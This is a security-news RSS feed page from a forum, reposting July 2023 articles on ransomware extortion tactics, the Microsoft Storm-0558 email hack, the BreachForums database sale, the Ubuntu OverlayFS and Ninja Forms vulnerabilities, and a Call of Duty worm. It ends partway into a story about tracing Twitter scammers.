<?xml version="1.0"?>
<rss version="2.0"><channel><title><![CDATA[News: Security & Privacy News]]></title><link>https://nsaneforums.com/news/security-privacy-news/page/66/?d=2</link><description><![CDATA[News: Security & Privacy News]]></description><language>en</language><item><title>The Week in Ransomware - July 28th 2023 - New extortion tactics</title><link>https://nsaneforums.com/news/security-privacy-news/the-week-in-ransomware-july-28th-2023-new-extortion-tactics-r17416/</link><description><![CDATA[<p>
	With ransom payments declining, ransomware gangs are evolving their extortion tactics to utilize new methods to pressure victims.
</p>

<p>
	 
</p>

<p>
	This was seen by both the Clop and BlackCat/ALPHV ransomware gangs, who began utilizing new tactics as part of their extortion schemes.
</p>

<p>
	 
</p>

<p>
	Clop has begun to <a href="https://www.bleepingcomputer.com/news/security/clop-now-leaks-data-stolen-in-moveit-attacks-on-clearweb-sites/" target="_blank" rel="external nofollow">create clearweb sites to leak data</a> stolen during the MOVEit Transfer attacks, similar to a tactic introduced by ALPHV in 2022.
</p>

<p>
	 
</p>

<p>
	Using clearweb sites makes it easier to access the stolen data and could allow search engines to index the data and make it more readily available, further applying pressure on victims to have it removed.
</p>

<p>
	 
</p>

<p>
	At this time, Clop only targets the larger MOVEit victims, likely to avoid the overhead of maintaining so many individual sites.
</p>

<p>
	 
</p>

<p>
	We also saw a new extortion strategy from BlackCat, who <a href="https://www.bleepingcomputer.com/news/security/alphv-ransomware-adds-data-leak-api-in-new-extortion-strategy/" target="_blank" rel="external nofollow">introduced a new data leak API</a> that makes it easy to grab the latest information on who is listed on their data leak site.
</p>

<p>
	 
</p>

<p>
	This new technique aims to quickly spread awareness of the gang's new victims, hoping it pressures victims into paying a ransom.
</p>

<p>
	 
</p>

<p>
	Sophos also released new research containing further details on the new <a href="https://www.bleepingcomputer.com/news/security/new-nitrogen-malware-pushed-via-google-ads-for-ransomware-attacks/" target="_blank" rel="external nofollow">Nitrogen initial access malware used by BlackCat</a>.
</p>

<p>
	 
</p>

<p>
	Finally, we learned more about some recent attacks:
</p>

<p>
	 
</p>

<ul>
	<li>
		A MOVEit breach at Maximus <a href="https://www.bleepingcomputer.com/news/security/8-million-people-hit-by-data-breach-at-us-govt-contractor-maximus/" target="_blank" rel="external nofollow">exposed the data of up to 11 million people</a>.
	</li>
	<li>
		<a href="https://therecord.media/yamaha-confirms-cyberattack-after-multiple-ransomware-gangs-claim" rel="external nofollow" target="_blank">Yamaha was claimed by both Akira and Black Byte</a>.
	</li>
	<li>
		Hawai'i Community College <a href="https://www.bleepingcomputer.com/news/security/hawaii-community-college-pays-ransomware-gang-to-prevent-data-leak/" target="_blank" rel="external nofollow">paid a ransom to prevent the leak of data</a>.
	</li>
</ul>

<p>
	 
</p>

<p>
	Contributors and those who provided new ransomware information and stories this week include: <a href="https://twitter.com/billtoulas" rel="external nofollow" target="_blank">@billtoulas</a>, <a href="https://twitter.com/Seifreed" rel="external nofollow" target="_blank">@Seifreed</a>, <a href="https://twitter.com/malwareforme" rel="external nofollow" target="_blank">@malwareforme</a>, <a href="https://twitter.com/BleepinComputer" rel="external nofollow" target="_blank">@BleepinComputer</a>, <a href="https://twitter.com/LawrenceAbrams" rel="external nofollow" target="_blank">@LawrenceAbrams</a>, <a href="https://twitter.com/demonslay335" rel="external nofollow" target="_blank">@demonslay335</a>, <a href="https://twitter.com/struppigel" rel="external nofollow" target="_blank">@struppigel</a>, <a href="https://twitter.com/DanielGallagher" rel="external nofollow" target="_blank">@DanielGallagher</a>, <a href="https://twitter.com/malwrhunterteam" rel="external nofollow" target="_blank">@malwrhunterteam</a>, <a href="https://twitter.com/VK_Intel" rel="external nofollow" target="_blank">@VK_Intel</a>, <a href="https://twitter.com/serghei" rel="external nofollow" target="_blank">@serghei</a>, <a href="https://twitter.com/fwosar" rel="external nofollow" target="_blank">@fwosar</a>, <a href="https://twitter.com/Ionut_Ilascu" rel="external nofollow" target="_blank">@Ionut_Ilascu</a>, <a href="https://twitter.com/FourOctets" rel="external nofollow" target="_blank">@FourOctets</a>, <a href="https://twitter.com/jorntvdw" rel="external nofollow" target="_blank">@jorntvdw</a>, <a href="https://twitter.com/PolarToffee" rel="external nofollow" target="_blank">@PolarToffee</a>, <a href="https://twitter.com/jgreigj" rel="external nofollow" target="_blank">@jgreigj</a>, <a href="https://twitter.com/BrettCallow" rel="external nofollow" target="_blank">@BrettCallow</a>, <a href="https://twitter.com/SophosXOps" rel="external nofollow" target="_blank">@SophosXOps</a>, <a 
href="https://twitter.com/eSentire" rel="external nofollow" target="_blank">@eSentire</a>, <a href="https://twitter.com/vxunderground" rel="external nofollow" target="_blank">@vxunderground</a>, <a href="https://twitter.com/AlvieriD" rel="external nofollow" target="_blank">@AlvieriD</a>, and <a href="https://twitter.com/pcrisk" rel="external nofollow" target="_blank">@pcrisk</a>.
</p>

<h2>
	July 23rd 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/clop-now-leaks-data-stolen-in-moveit-attacks-on-clearweb-sites/" target="_blank" rel="external nofollow">Clop now leaks data stolen in MOVEit attacks on clearweb sites</a>
</h3>

<p>
	The Clop ransomware gang is copying an ALPHV ransomware gang extortion tactic by creating Internet-accessible websites dedicated to specific victims, making it easier to leak stolen data and further pressuring victims into paying a ransom.
</p>

<h2>
	July 24th 2023
</h2>

<h3>
	<a href="https://therecord.media/yamaha-confirms-cyberattack-after-multiple-ransomware-gangs-claim" rel="external nofollow" target="_blank">Yamaha confirms cyberattack after multiple ransomware gangs claim attacks</a>
</h3>

<p>
	Yamaha’s Canadian music division confirmed that it recently dealt with a cyberattack after two different ransomware groups claimed to have attacked the company.
</p>

<h3>
	<a href="https://www.cloudsek.com/threatintelligence/akira-ransomware-what-you-need-to-know" rel="external nofollow" target="_blank">Akira Ransomware: What You Need to Know</a>
</h3>

<p>
	Akira ransomware is a new and sophisticated threat that has been targeting organizations in recent months. The ransomware encrypts files on the victim's system and then demands a ransom payment in order to decrypt them.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1683331356934144000" rel="external nofollow" target="_blank">New STOP ransomware variant</a>
</h3>

<p>
	<a href="https://twitter.com/pcrisk" rel="external nofollow" target="_blank">PCrisk</a> found a new STOP ransomware variant that appends the .kitu extension.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1683364294446968835" rel="external nofollow" target="_blank">New Architects ransomware</a>
</h3>

<p>
	PCrisk found a new Architects ransomware, which appends the .architects extension and drops a ransom note named readme.txt.
</p>

<h2>
	July 26th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/new-nitrogen-malware-pushed-via-google-ads-for-ransomware-attacks/" target="_blank" rel="external nofollow">New Nitrogen malware pushed via Google Ads for ransomware attacks</a>
</h3>

<p>
	A new 'Nitrogen' initial access malware campaign uses Google and Bing search ads to promote fake software sites that infect unsuspecting users with Cobalt Strike and ransomware payloads.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/alphv-ransomware-adds-data-leak-api-in-new-extortion-strategy/" target="_blank" rel="external nofollow">ALPHV ransomware adds data leak API in new extortion strategy</a>
</h3>

<p>
	The ALPHV ransomware gang, also referred to as BlackCat, is trying to put more pressure on their victims to pay a ransom by providing an API for their leak site to increase visibility for their attacks.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1684060019396866048" rel="external nofollow" target="_blank">New STOP ransomware variants</a>
</h3>

<p>
	PCrisk found new STOP ransomware variants that append the .wsuu and .wsaz extensions.
</p>

<h2>
	July 27th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/8-million-people-hit-by-data-breach-at-us-govt-contractor-maximus/" target="_blank" rel="external nofollow">8 million people hit by data breach at US govt contractor Maximus</a>
</h3>

<p>
	U.S. government services contractor Maximus has disclosed a data breach warning that hackers stole the personal data of 8 to 11 million people during the recent MOVEit Transfer data-theft attacks.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1684502672597032964" rel="external nofollow" target="_blank">New STOP ransomware variant</a>
</h3>

<p>
	PCrisk found a new STOP ransomware variant that appends the .wspn extension.
</p>

<h2>
	July 28th 2023
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/hawaii-community-college-pays-ransomware-gang-to-prevent-data-leak/" target="_blank" rel="external nofollow">Hawai'i Community College pays ransomware gang to prevent data leak</a>
</h3>

<p>
	The Hawai'i Community College has admitted that it paid a ransom to ransomware actors to prevent the leaking of stolen data of approximately 28,000 people.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1684794830717640705" rel="external nofollow" target="_blank">New Black Berserk ransomware</a>
</h3>

<p>
	PCrisk found the Black Berserk ransomware, which appends the .Black extension and drops a ransom note named Black_Recover.txt.
</p>

<h3>
	That's it for this week! Hope everyone has a nice weekend!
</h3>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-july-28th-2023-new-extortion-tactics/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17416</guid><pubDate>Fri, 28 Jul 2023 21:50:50 +0000</pubDate></item><item><title>Microsoft slammed for negligent cybersecurity following Chinese hack</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-slammed-for-negligent-cybersecurity-following-chinese-hack-r17405/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Microsoft could face further investigation after attack</span>
</p>

<p>
	 
</p>

<p>
	US senator Ron Wyden is calling on three separate bodies to conduct their own investigations into Microsoft following the recent email hacking attack that saw government officials like Commerce Secretary Gina Raimondo and Secretary of State Antony Blinken targeted.
</p>

<p>
	 
</p>

<p>
	According to Microsoft’s own accounts, a Chinese threat actor that is being tracked as Storm-0558 “gained access to email accounts affecting approximately 25 organizations in the public cloud including government agencies.” Redmond said that related consumer accounts of individuals associated with these affected organizations were also compromised.
</p>

<p>
	 
</p>

<p>
	In his letter, Senator Wyden likens the attack to the 2020 SolarWinds campaign by a Russian threat actor, during which US government emails were also hacked.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Microsoft may face yet another investigation - or three</strong></span>
</p>

<p>
	<br />
	Microsoft is already under severe scrutiny in the EU, and has been for years, owing to a number of antitrust and anticompetitive cases. Most recently, the company has come under fire for its unfair cloud practices concerning its Azure platform.
</p>

<p>
	 
</p>

<p>
	This time, it’s a trio of US agencies that are being asked to launch their own, individual probes into Microsoft.
</p>

<p>
	 
</p>

<p>
	More specifically, Wyden asked the Cybersecurity and Infrastructure Security Agency (CISA) to investigate whether the company had violated best practices recommended by none other than itself and the National Security Agency (NSA), the Department of Justice whether “Microsoft’s negligent practices violated federal law,” and the Federal Trade Commission (FTC) whether Microsoft “violated federal laws enforced by the [FTC],” particularly around deceptive business practices.
</p>

<p>
	 
</p>

<p>
	Concluding the letter, Senator Wyden writes: “I also urge you to take all necessary steps to hold the company responsible for any violations of that order.”
</p>

<p>
	 
</p>

<p>
	A company spokesperson told<span style="color:#2980b9;"> CNBC:</span>
</p>

<p>
	 
</p>

<p>
	“This incident demonstrates the evolving challenges of cybersecurity in the face of sophisticated attacks. We continue to work directly with government agencies on this issue, and maintain our commitment to continue sharing information at Microsoft Threat Intelligence blog.”
</p>

<p>
	The company did not immediately respond to our request for commentary on the potential threat of three separate probes.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.techradar.com/pro/microsoft-slammed-for-negligent-cybersecurity-following-chinese-hack" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17405</guid><pubDate>Fri, 28 Jul 2023 15:53:37 +0000</pubDate></item><item><title>BreachForums database and private chats for sale in hacker data breach</title><link>https://nsaneforums.com/news/security-privacy-news/breachforums-database-and-private-chats-for-sale-in-hacker-data-breach-r17398/</link><description><![CDATA[<p>
	While consumers are usually the ones worried about their information being exposed in data breaches, it's now the hacker's turn, as the notorious Breached cybercrime forum's database is up for sale and member data shared with Have I Been Pwned.
</p>

<p>
	 
</p>

<p>
	Yesterday, the <a href="https://haveibeenpwned.com/" rel="external nofollow" target="_blank">Have I Been Pwned</a> data breach notification service announced that visitors can check if their information was exposed in a data breach of the Breached cybercrime forum.
</p>

<p>
	 
</p>

<p>
	"In November 2022, the well-known hacking forum "BreachForums" was itself, breached. Later the following year, <a href="https://www.bleepingcomputer.com/news/security/fbi-seizes-breachforums-after-arresting-its-owner-pompompurin-in-march/" target="_blank" rel="external nofollow">the operator of the website was arrested and the site seized by law enforcement agencies</a>," reads the HIBP announcement.
</p>

<p>
	 
</p>

<p>
	"The breach exposed 212k records including usernames, IP and email addresses, private messages between site members and passwords stored as argon2 hashes."
</p>

<p>
	 
</p>

<p>
	Breached was a large hacking and data leak forum notorious for hosting, leaking, and selling data stolen from hacked companies, governments, and organizations worldwide.
</p>

<p>
	 
</p>

<p>
	After the <a href="https://www.bleepingcomputer.com/news/security/alleged-breachforums-owner-pompompurin-arrested-on-cybercrime-charges/" target="_blank" rel="external nofollow">FBI arrested the site's admin Pompompurin</a> in March 2023, the remaining administrator, Baphomet, decided to <a href="https://www.bleepingcomputer.com/news/security/breached-hacking-forum-shuts-down-fears-its-not-safe-from-fbi/" target="_blank" rel="external nofollow">shut the forum down</a> after believing that law enforcement also had access to the site's servers.
</p>

<p>
	 
</p>

<p>
	Baphomet later launched a new Breached Forums clone (called in this article BFv2) with another data breach seller known as <a href="https://www.bleepingcomputer.com/news/security/hacker-leaks-386-million-user-records-from-18-companies-for-free/" target="_blank" rel="external nofollow">Shiny Hunters</a>.
</p>

<h2>
	A treasure trove of data
</h2>

<p>
	The Breached database is currently being sold by a threat actor going by the name 'breached_db_person,' who told BleepingComputer they shared the database with Have I Been Pwned to prove its authenticity to potential buyers.
</p>

<p>
	 
</p>

<p>
	BleepingComputer has also confirmed that known Breached accounts are listed in the shared member's table.
</p>

<p>
	 
</p>

<p>
	Previous Breached admin Baphomet has also confirmed the authenticity of the database, warning that its sale is part of a "continued campaign attempting to destroy the community."
</p>

<p>
	 
</p>

<p>
	"Not only was the database submitted to HIBP, but it's being actively sold/leaked by at least one person - even attempting to do so on our forum," warned Baphomet.
</p>

<p>
	 
</p>

<p>
	"For that reason I'm sure we're going to see it public soon enough. Judging by the 212k users, this is likely an older database months before the closing of BFv1, seeing that my last backup of the forum has 336k users."
</p>

<p>
	 
</p>

<p>
	Other than law enforcement, the seller said that only they, Baphomet, and Pompompurin have possession of the database.
</p>

<p>
	 
</p>

<p>
	The threat actor says they are selling the Breached database to only one person for $100,000 - $150,000 and that it contains a snapshot of the entire database taken on November 29th, 2022.
</p>

<p>
	 
</p>

<p>
	BleepingComputer was told that the database is 2 GB and contains all tables, including those for private messages, payment transactions, and the member database.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="breached-database-structure.jpg" class="ipsImage" data-ratio="75.10" height="395" width="720" src="https://www.bleepstatic.com/images/news/security/d/data-breaches/breached/breached-database-structure.jpg">
	</p>

	<div>
		<em>Breached Forum SQL tables. Source: BleepingComputer</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	While the FBI already revealed that they <a href="https://www.bleepingcomputer.com/news/security/fbi-confirms-access-to-breached-cybercrime-forum-database/" target="_blank" rel="external nofollow">gained access to the Breached database</a> after they seized the servers, this data can still be valuable for cybersecurity researchers and potentially other threat actors.
</p>

<p>
	 
</p>

<p>
	The seller, breached_db_person, told BleepingComputer that the private message tables have a lot of incriminating information about forum members and that the 'members' database contains IP addresses showing that many threat actors don't follow good operational security by using residential IP addresses.
</p>

<p>
	 
</p>

<p>
	The private messages table is valuable as it contains messages sent privately between the different members of the forum, potentially revealing information on past attacks, identities, and other useful information.
</p>

<p>
	 
</p>

<p>
	Samples of the payments table were shared with BleepingComputer and contain information on payments made to purchase forum ranks (membership levels with extra benefits) and credits (a form of currency used on the forum).
</p>

<p>
	 
</p>

<p>
	These payments were processed through Coinbase Commerce or Sellix, with the Coinbase transactions including links to order confirmations containing sensitive information, such as cryptocurrency addresses and Coinbase payment IDs.
</p>

<p>
	 
</p>

<p>
	This cryptocurrency data can be useful to blockchain analytics companies, who can use the cryptocurrency addresses to link threat actors to criminal activity.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="coinbase-payment.jpg" class="ipsImage" data-ratio="75.10" height="404" width="720" src="https://www.bleepstatic.com/images/news/security/d/data-breaches/coinbase-payment.jpg">
	</p>

	<div>
		<em>Purchase of the Breached 'God' forum rank via Coinbase. Source: BleepingComputer</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	Breached and its members have been responsible for a wide range of hacks, extortion attempts, ransomware attacks, and the leaking of stolen data for many companies. These breaches include <a href="https://www.bleepingcomputer.com/news/security/fbi-investigates-data-breach-impacting-us-house-members-and-staff/" target="_blank" rel="external nofollow">DC Health Link</a>, <a href="https://www.bleepingcomputer.com/news/security/hacker-selling-twitter-account-data-of-54-million-users-for-30k/" target="_blank" rel="external nofollow">Twitter</a>, <a href="https://www.bleepingcomputer.com/news/security/7-million-robinhood-user-email-addresses-for-sale-on-hacker-forum/" target="_blank" rel="external nofollow">RobinHood</a>, <a href="https://www.bleepingcomputer.com/news/security/acer-confirms-breach-after-160gb-of-data-for-sale-on-hacking-forum/" target="_blank" rel="external nofollow">Acer</a>, <a href="https://www.bleepingcomputer.com/news/security/hacker-leaks-alleged-activision-employee-data-on-cybercrime-forum/" target="_blank" rel="external nofollow">Activision</a>, and many more.
</p>

<p>
	 
</p>

<p>
	Therefore, the private messages could be invaluable for researchers, with the seller stating that they have already been contacted by cybersecurity firms requesting a copy of the data for their own research.
</p>

<p>
	 
</p>

<p>
	Other threat actors are also showing interest, with the seller saying they received an offer for $250,000.
</p>

<p>
	 
</p>

<p>
	While it is too soon to tell whether the database will ultimately be sold, even if it is, it would not be surprising for the entire database to be leaked for free in the future.
</p>

<p>
	 
</p>

<p>
	It is common for data breaches to first be purchased privately and then released later to increase reputation among the data theft community.
</p>

<p>
	 
</p>

<p>
	Just recently, the <a href="https://www.bleepingcomputer.com/news/security/raidforums-hacking-forum-seized-by-police-owner-arrested/" target="_blank" rel="external nofollow">seized RaidForums data breach forum</a> also <a href="https://www.bleepingcomputer.com/news/security/new-hacking-forum-leaks-data-of-478-000-raidforums-members/" target="_blank" rel="external nofollow">suffered a data breach</a>, and the new BreachedForums clone (BFv2) had its database leaked.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/breachforums-database-and-private-chats-for-sale-in-hacker-data-breach/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17398</guid><pubDate>Fri, 28 Jul 2023 08:26:24 +0000</pubDate></item><item><title>Ubuntu Linux Cloud Workloads Face Rampant Root Takeovers</title><link>https://nsaneforums.com/news/security-privacy-news/ubuntu-linux-cloud-workloads-face-rampant-root-take-takeovers-r17387/</link><description><![CDATA[<p>
	<span style="font-size:22px;">Some 40% of Ubuntu Linux cloud workloads subject to GameOverlay security bugs in the OverlayFS module.</span>
</p>

<p>
	 
</p>

<p>
	Two vulnerabilities in the Ubuntu implementation of a popular container-based file system allow attackers to execute code with root privileges on 40% of Ubuntu Linux cloud workloads, researchers have found.
</p>

<p>
	 
</p>

<p>
	The flaws — tracked as CVE-2023-2640 and CVE-2023-32629 and dubbed "GameOverlay" by Wiz researchers — are found in the OverlayFS module of Ubuntu Linux and are the result of changes Ubuntu made to the module in 2018, which, at the time, posed no threat, researchers from cloud security firm Wiz revealed in a blog post.
</p>

<p>
	 
</p>

<p>
	Both vulnerabilities are easy to exploit; in fact, weaponized exploits for them already are publicly available "given old exploits for past OverlayFS vulnerabilities work out of the box without any changes," Wiz's Sagi Tzadik and Shir Tamari noted in the post.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Linux Kernel Security "Spaghetti"</strong></span>
</p>

<p>
	<br />
	OverlayFS is a Linux filesystem enabling the deployment of dynamic filesystems based on pre-built images, which has made it a popular choice for container-based cloud environments that run on the open-source OS.
</p>

<p>
	 
</p>

<p>
	The Linux kernel project modified the OverlayFS module in 2019 and 2022 in ways that conflicted with Ubuntu's 2018 changes. Thus, when Ubuntu adopted the Linux project's changes, it inadvertently introduced the two CVEs into its version of the OS, one in 2019 (CVE-2023-32629) and the other (CVE-2023-2640) in 2022, the researchers said.
</p>

<p>
	 
</p>

<p>
	"Both vulnerabilities are unique to Ubuntu kernels since they stemmed from Ubuntu's individual changes to the OverlayFS module," they wrote.
</p>

<p>
	What's more, since the flaws are the result of subtle changes introduced by Ubuntu years ago, it suggests they may not be the only issues lurking in "the shadows of the Linux kernel spaghetti," Wiz CTO and co-founder Ami Luttwak observes in an email to Dark Reading.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>How Elevated User Privileges Occur</strong></span>
</p>

<p>
	<br />
	Ubuntu has patched the flaws, among several others, in a security update released this week. Both flaws, discovered by Tzadik and Tamari, cause OverlayFS running on Ubuntu Linux to fail to perform permission checks properly in certain situations, allowing a local attacker to elevate privileges on the system, according to the update.
</p>

<p>
	 
</p>

<p>
	The flaws, while separate, create similar exploitable scenarios, yet affect slightly different versions of the kernel. They both affect a feature of OverlayFS that allows the file system to be mounted by any user within a user "namespace," which, in turn, enables the mapping of user and group IDs between the host and a new, separated execution environment, like in a namespace or container. This ensures user isolation and privilege separation in Linux-based cloud deployments.
</p>

<p>
	 
</p>

<p>
	"When a low-privileged Linux user enters a new user namespace, they are automatically granted all Linux capabilities within that namespace," the researchers wrote. "These capabilities empower them to perform some administrative-like operations, such as mounting a set of filesystems."
</p>

<p>
	 
</p>

<p>
	Exploiting the flaws allows the creation of specialized executables that, when executed, grant the ability to escalate privileges to "root" on the affected machine. An attacker can then exploit a Linux feature — only available to a root user — called "file capabilities" that grants elevated privileges to executables while they're executed.
</p>

<p>
	 
</p>

<p>
	"We discovered that it's possible to craft an executable file with scoped file capabilities and trick the Ubuntu Kernel into copying it to a different location with unscoped capabilities, granting anyone who executes it root-like privileges," the researchers wrote.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Linux's Security Dilemma</strong></span>
</p>

<p>
	<br />
	The vulnerabilities highlight a common issue for Linux, which has remained open source even as its distribution base has grown exponentially, thus making it a bigger target for threat actors, particularly across cloud environments. In fact, the versions of Ubuntu impacted by the flaws are prevalent in the cloud, as they serve as the default OSes for multiple cloud service providers (CSPs), the researchers said.
</p>

<p>
	 
</p>

<p>
	While open source certainly has its advantages, it also comes with challenges. In this case, since developers have free rein to update the OS code base to suit the particular needs of a deployment, it creates conflict with the Linux kernel that's maintained as the standard, the researchers noted.
</p>

<p>
	"This shows the complex relationship between Linux kernel and distro versions, when both are updating the kernel for different use cases," they wrote. "This complexity introduces … hard-to-predict risks."
</p>

<p>
	 
</p>

<p>
	<span style="font-size:22px;"><strong>Mitigation &amp; Protection for Ubuntu Cloud Vulns</strong></span>
</p>

<p>
	<br />
	Wiz recommends that security teams of affected Ubuntu-based cloud environments immediately patch workloads affected by the flaws to mitigate risks. They also can apply a simpler mitigation — that is, "restricting OverlayFS to root users only," Raaz Herzberg, head of product, tells Dark Reading.
</p>

<p>
	 
</p>

<p>
	He advises administrators to refer to Ubuntu's security advisory on each of the flaws — and follow the mitigation steps found there. Those instructions are available in Ubuntu's advisories for CVE-2023-32629 and for CVE-2023-2640.
</p>

<p>
	 
</p>

<p>
	Overall, administrators of cloud environments should keep all software running in container-based environments up-to-date to mitigate known vulnerabilities, and ensure they have visibility into all of their software assets across the entire cloud to stay on top of patching, Herzberg advises.
</p>

<p>
	They also should limit Internet exposure only to the assets that absolutely need it to perform their essential functions and enforce strict permissions across the environment to limit the attack surface, he adds.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.darkreading.com/cloud/ubuntu-linux-cloud-workloads-face-rampant-root-takeovers" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17387</guid><pubDate>Thu, 27 Jul 2023 20:09:32 +0000</pubDate></item><item><title>WordPress Ninja Forms plugin flaw lets hackers steal submitted data</title><link>https://nsaneforums.com/news/security-privacy-news/wordpress-ninja-forms-plugin-flaw-lets-hackers-steal-submitted-data-r17371/</link><description><![CDATA[<p>
	Popular WordPress form-building plugin Ninja Forms contains three vulnerabilities that could allow attackers to achieve privilege escalation and steal user data.
</p>

<p>
	 
</p>

<p>
	Researchers at <a href="https://patchstack.com/articles/multiple-high-severity-vulnerabilities-in-ninja-forms-plugin/" rel="external nofollow" target="_blank">Patchstack</a> discovered and disclosed the three vulnerabilities to the plugin's developer, Saturday Drive, on June 22nd, 2023, warning that it affects NinjaForms versions 3.6.25 and older.
</p>

<p>
	 
</p>

<p>
	The developers released version 3.6.26 on July 4th, 2023, to fix the vulnerabilities. However, <a href="https://wordpress.org/plugins/ninja-forms/advanced/" rel="external nofollow" target="_blank">WordPress.org stats</a> show that only roughly half of all NinjaForms users have downloaded the latest release, leaving about 400,000 sites vulnerable to attacks.
</p>

<h2>
	The vulnerabilities
</h2>

<p>
	The first vulnerability discovered by Patchstack is CVE-2023-37979, a POST-based reflected XSS (cross-site scripting) flaw that allows unauthenticated users to escalate their privileges and steal information by tricking privileged users into visiting a specially-crafted webpage.
</p>

<p>
	 
</p>

<p>
	The second and third problems, tracked as CVE-2023-38393 and CVE-2023-38386, respectively, are broken access control issues on the plugin's form submissions export feature, allowing Subscribers and Contributors to export all of the data that users have submitted on the impacted WordPress site.
</p>

<p>
	 
</p>

<p>
	Although the issues are rated as high-severity, CVE-2023-38393 is particularly dangerous because the Subscriber role it requires is easy to obtain.
</p>

<p>
	 
</p>

<p>
	Any site that supports membership and user registrations would be susceptible to massive data breach incidents due to that flaw if they use a vulnerable Ninja Forms plugin version.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="function(1).jpg" class="ipsImage" data-ratio="75.10" height="540" width="337" src="https://www.bleepstatic.com/images/news/u/1220909/2023/WordPress/function(1).jpg">
	</p>

	<div>
		<em>The processing function that contains CVE-2023-38393(Patchstack)</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	The patches applied by the vendor in version 3.6.26 include adding permission checks for the broken access control issues and function access restrictions that prevent triggering the identified XSS.
</p>

<p>
	 
</p>

<p>
	Publicly reporting the above flaws was delayed by over three weeks to prevent drawing the attention of hackers to the flaws while allowing Ninja Forms users to patch. However, there's still a significant number who haven't at this time.
</p>

<p>
	 
</p>

<p>
	Patchstack's coverage contains detailed technical information about the three flaws, so exploiting them should be trivial for knowledgeable threat actors.
</p>

<p>
	 
</p>

<p>
	That said, all website admins who use the Ninja Forms plugin are recommended to update to version 3.6.26 or later as soon as possible. If that is not possible, admins should disable the plugin from their sites until they can apply the patch.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/wordpress-ninja-forms-plugin-flaw-lets-hackers-steal-submitted-data/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">17371</guid><pubDate>Thu, 27 Jul 2023 19:28:38 +0000</pubDate></item><item><title>Hackers are infecting Call of Duty players with a self-spreading malware</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-are-infecting-call-of-duty-players-with-a-self-spreading-malware-r17365/</link><description><![CDATA[<p>
	Hackers are infecting players of an old Call of Duty game with a worm that spreads automatically in online lobbies, according to two analyses of the malware.
</p>

<p>
	 
</p>

<p>
	On June 26, a user on a Steam forum alerted other players of Call of Duty: Modern Warfare 2 that hackers “attack using hacked lobbies,” and suggested running an antivirus. The malware mentioned in the thread appears to be on the malware online repository VirusTotal.
</p>

<p>
	 
</p>

<p>
	Another player claimed to have analyzed the malware and wrote in the same forum thread that the malware appears to be a worm, based on a series of text strings inside the malware. A game industry insider, who asked to remain anonymous because they were not allowed to speak to the press, confirmed that the malware contains those strings, indicating a worm.
</p>

<p>
	 
</p>

<p>
	Activision spokesperson Neil Wood referred to a tweet posted by the company on an official Call of Duty updates Twitter account, which vaguely acknowledges the malware.
</p>

<p>
	 
</p>

<p>
	“Multiplayer for Call of Duty: Modern Warfare 2 (2009) on Steam was brought offline while we investigate reports of an issue,” the tweet read.
</p>

<p>
	 
</p>

<p>
	It’s unclear why the hackers are spreading this malware. The malware is a worm because it appears to spread through online lobbies automatically from one infected player to another. This means the hackers must have found and are exploiting one or multiple bugs in the game to execute malicious code on the other players’ computers.
</p>

<p>
	 
</p>

<p>
	Call of Duty: Modern Warfare 2 was released by games giant Activision in 2009, but still has a small online community of players. According to a website that tracks the number of players who are playing video games online, there were around 600 people playing the game at the time of writing.
</p>

<p>
	 
</p>

<p>
	Valve, which runs the Steam platform, did not respond to a request for comment.
</p>

<p>
	 
</p>

<p>
	While there have been cases of malware distributed through video games, usually this is through trojanized versions of game installers and even cheats.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://techcrunch.com/2023/07/27/hackers-are-infecting-call-of-duty-players-with-a-self-spreading-malware/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">17365</guid><pubDate>Thu, 27 Jul 2023 16:59:49 +0000</pubDate></item><item><title>Twitter Scammers Stole $1,000 From My Friend&#x2014;So I Hunted Them Down</title><link>https://nsaneforums.com/news/security-privacy-news/twitter-scammers-stole-1000-from-my-friend%E2%80%94so-i-hunted-them-down-r17346/</link><description><![CDATA[<h3>
	After scammers duped a friend with a hacked Twitter account and a “deal” on a MacBook, I enlisted the help of a fellow threat researcher to trace the criminals’ offline identities.
</h3>

<p>
	Embarrassed, angry, victimized. Those are just a few of the words my friend uses to describe his recent run-in with a cybercriminal that used a hacked Twitter account to scam people out of hundreds of dollars. Twitter, meanwhile, ignored his pleas for help. That’s when I got involved.
</p>

<p>
	 
</p>

<p>
